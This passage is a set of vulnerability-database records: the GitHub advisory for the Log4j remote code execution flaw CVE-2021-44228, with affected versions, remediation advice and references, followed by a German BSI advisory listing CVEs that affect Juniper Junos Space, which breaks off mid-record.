"title": "Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021 (CVE-2021-45105)"
}
]
}
ghsa-jfh8-c2jp-5v3q
Vulnerability from github
Published
2021-12-10 00:40
Modified
2024-07-25 20:12
Severity ?
Summary
Remote code injection in Log4j
Details
Summary
Log4j versions prior to 2.16.0 are subject to a remote code execution vulnerability via the ldap JNDI parser. As per Apache's Log4j security guide: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.16.0, this behavior has been disabled by default.
Log4j version 2.15.0 contained an earlier fix for the vulnerability, but that patch did not disable attacker-controlled JNDI lookups in all situations. For more information, see the Updated advice for version 2.16.0 section of this advisory.
Impact
Logging untrusted or user controlled data with a vulnerable version of Log4J may result in Remote Code Execution (RCE) against your application. This includes untrusted data included in logged errors such as exception traces, authentication failures, and other unexpected vectors of user controlled input.
Affected versions
Any Log4J version prior to v2.15.0 is affected to this specific issue.
The v1 branch of Log4J which is considered End Of Life (EOL) is vulnerable to other RCE vectors so the recommendation is to still update to 2.16.0 where possible.
Security releases
Additional backports of this fix have been made available in versions 2.3.1, 2.12.2, and 2.12.3
Affected packages
Only the org.apache.logging.log4j:log4j-core package is directly affected by this vulnerability. The org.apache.logging.log4j:log4j-api should be kept at the same version as the org.apache.logging.log4j:log4j-core package to ensure compatability if in use.
Remediation Advice
Updated advice for version 2.16.0
The Apache Logging Services team provided updated mitigation advice upon the release of version 2.16.0, which disables JNDI by default and completely removes support for message lookups. Even in version 2.15.0, lookups used in layouts to provide specific pieces of context information will still recursively resolve, possibly triggering JNDI lookups. This problem is being tracked as CVE-2021-45046. More information is available on the GitHub Security Advisory for CVE-2021-45046.
Users who want to avoid attacker-controlled JNDI lookups but cannot upgrade to 2.16.0 must ensure that no such lookups resolve to attacker-provided data and ensure that the the JndiLookup class is not loaded.
Please note that Log4J v1 is End Of Life (EOL) and will not receive patches for this issue. Log4J v1 is also vulnerable to other RCE vectors and we recommend you migrate to Log4J 2.16.0 where possible.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.logging.log4j:log4j-core"
},
"ranges": [
{
"events": [
{
"introduced": "2.13.0"
},
{
"fixed": "2.15.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.logging.log4j:log4j-core"
},
"ranges": [
{
"events": [
{
"introduced": "2.0-beta9"
},
{
"fixed": "2.3.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.logging.log4j:log4j-core"
},
"ranges": [
{
"events": [
{
"introduced": "2.4"
},
{
"fixed": "2.12.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "com.guicedee.services:log4j-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.2.1.2-jre17"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xbib.elasticsearch:log4j"
},
"versions": [
"6.3.2.1"
]
},
{
"package": {
"ecosystem": "Maven",
"name": "uk.co.nichesolutions.logging.log4j:log4j-core"
},
"versions": [
"2.6.3-CUSTOM"
]
}
],
"aliases": [
"CVE-2021-44228"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-400",
"CWE-502",
"CWE-917"
],
"github_reviewed": true,
"github_reviewed_at": "2021-12-10T00:40:41Z",
"nvd_published_at": "2021-12-10T10:15:00Z",
"severity": "CRITICAL"
},
"details": "# Summary\n\nLog4j versions prior to 2.16.0 are subject to a remote code execution vulnerability via the ldap JNDI parser.\nAs per [Apache\u0027s Log4j security guide](https://logging.apache.org/log4j/2.x/security.html): Apache Log4j2 \u003c=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.16.0, this behavior has been disabled by default.\n\nLog4j version 2.15.0 contained an earlier fix for the vulnerability, but that patch did not disable attacker-controlled JNDI lookups in all situations. For more information, see the `Updated advice for version 2.16.0` section of this advisory.\n\n# Impact\n\nLogging untrusted or user controlled data with a vulnerable version of Log4J may result in Remote Code Execution (RCE) against your application. This includes untrusted data included in logged errors such as exception traces, authentication failures, and other unexpected vectors of user controlled input. \n\n# Affected versions\n\nAny Log4J version prior to v2.15.0 is affected to this specific issue.\n\nThe v1 branch of Log4J which is considered End Of Life (EOL) is vulnerable to other RCE vectors so the recommendation is to still update to 2.16.0 where possible.\n\n## Security releases\nAdditional backports of this fix have been made available in versions 2.3.1, 2.12.2, and 2.12.3\n\n## Affected packages\nOnly the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use.\n\n# Remediation Advice\n\n## Updated advice for version 2.16.0\n\nThe Apache Logging Services team provided updated mitigation advice upon the release of version 2.16.0, which [disables JNDI by default and completely removes support for message lookups](https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0).\nEven in version 2.15.0, lookups used in layouts to provide specific pieces of context information will still recursively resolve, possibly triggering JNDI lookups. This problem is being tracked as [CVE-2021-45046](https://nvd.nist.gov/vuln/detail/CVE-2021-45046). More information is available on the [GitHub Security Advisory for CVE-2021-45046](https://github.com/advisories/GHSA-7rjr-3q55-vv33).\n\nUsers who want to avoid attacker-controlled JNDI lookups but cannot upgrade to 2.16.0 must [ensure that no such lookups resolve to attacker-provided data and ensure that the the JndiLookup class is not loaded](https://issues.apache.org/jira/browse/LOG4J2-3221).\n\nPlease note that Log4J v1 is End Of Life (EOL) and will not receive patches for this issue. Log4J v1 is also vulnerable to other RCE vectors and we recommend you migrate to Log4J 2.16.0 where possible.\n\n",
"id": "GHSA-jfh8-c2jp-5v3q",
"modified": "2024-07-25T20:12:08Z",
"published": "2021-12-10T00:40:56Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"type": "WEB",
"url": "https://github.com/apache/logging-log4j2/pull/608"
},
{
"type": "WEB",
"url": "https://logging.apache.org/log4j/2.x/changes-report.html#a2.15.0"
},
{
"type": "WEB",
"url": "https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup"
},
{
"type": "WEB",
"url": "https://logging.apache.org/log4j/2.x/manual/migration.html"
},
{
"type": "WEB",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"type": "WEB",
"url": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2"
},
{
"type": "WEB",
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20211210-0007"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT213189"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"type": "WEB",
"url": "https://twitter.com/kurtseifried/status/1469345530182455296"
},
{
"type": "WEB",
"url": "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2021/dsa-5020"
},
{
"type": "WEB",
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html"
},
{
"type": "WEB",
"url": "https://www.kb.cert.org/vuls/id/930724"
},
{
"type": "WEB",
"url": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-7rjr-3q55-vv33"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/logging-log4j2"
},
{
"type": "WEB",
"url": "https://github.com/cisagov/log4j-affected-db"
},
{
"type": "WEB",
"url": "https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md"
},
{
"type": "WEB",
"url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228"
},
{
"type": "WEB",
"url": "https://github.com/tangxiaofeng7/apache-log4j-poc"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3198"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3201"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3214"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3221"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2022/Dec/2"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2022/Jul/11"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2022/Mar/23"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/1"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/2"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/3"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/13/1"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/13/2"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/12/15/3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Remote code injection in Log4j"
}
wid-sec-w-2023-0063
Vulnerability from csaf_certbund
Published
2022-01-12 23:00
Modified
2023-01-11 23:00
Summary
Juniper Junos Space: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Junos Space ist eine Software-Plattform, die eine Reihe von Applikationen für das Netzwerkmanagement beinhaltet.
Angriff
Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter anonymer, authentisierter oder lokaler Angreifer kann mehrere Schwachstellen in Juniper Junos Space ausnutzen, um Sicherheitsmaßnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszulösen, beliebigen Code auszuführen und seine Privilegien zu erweitern.
Betroffene Betriebssysteme
- Juniper Appliance
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Junos Space ist eine Software-Plattform, die eine Reihe von Applikationen f\u00fcr das Netzwerkmanagement beinhaltet.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter anonymer, authentisierter oder lokaler Angreifer kann mehrere Schwachstellen in Juniper Junos Space ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Juniper Appliance",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2023-0063 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2022/wid-sec-w-2023-0063.json"
},
{
"category": "self",
"summary": "WID-SEC-2023-0063 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-0063"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA70182 vom 2023-01-12",
"url": "https://supportportal.juniper.net/s/article/2023-01-Security-Bulletin-Contrail-Service-Orchestration-Multiple-vulnerabilities-resolved-in-CSO-6-3-0?language=en_US"
},
{
"category": "external",
"summary": "Juniper Security Advisory vom 2022-01-12",
"url": "https://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA11287\u0026cat=SIRT_1"
}
],
"source_lang": "en-US",
"title": "Juniper Junos Space: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2023-01-11T23:00:00.000+00:00",
"generator": {
"date": "2024-08-15T17:41:07.526+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.5"
}
},
"id": "WID-SEC-W-2023-0063",
"initial_release_date": "2022-01-12T23:00:00.000+00:00",
"revision_history": [
{
"date": "2022-01-12T23:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2023-01-11T23:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von Juniper aufgenommen"
}
],
"status": "final",
"version": "2"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Juniper Contrail Service Orchestration",
"product": {
"name": "Juniper Contrail Service Orchestration",
"product_id": "T025794",
"product_identification_helper": {
"cpe": "cpe:/a:juniper:contrail_service_orchestration:-"
}
}
},
{
"category": "product_name",
"name": "Juniper Junos Space \u003c 21.3R1",
"product": {
"name": "Juniper Junos Space \u003c 21.3R1",
"product_id": "T021576",
"product_identification_helper": {
"cpe": "cpe:/a:juniper:junos_space:21.3r1"
}
}
}
],
"category": "vendor",
"name": "Juniper"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2019-17543",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2019-17543"
},
{
"cve": "CVE-2019-20934",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2019-20934"
},
{
"cve": "CVE-2020-0543",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-0543"
},
{
"cve": "CVE-2020-0548",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-0548"
},
{
"cve": "CVE-2020-0549",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-0549"
},
{
"cve": "CVE-2020-11022",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-11022"
},
{
"cve": "CVE-2020-11023",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-11023"
},
{
"cve": "CVE-2020-11668",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-11668"
},
{
"cve": "CVE-2020-11984",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-11984"
},
{
"cve": "CVE-2020-11993",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-11993"
},
{
"cve": "CVE-2020-12362",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2020-12362"
},
{
"cve": "CVE-2020-12363",
"notes": [
{
"category": "description",
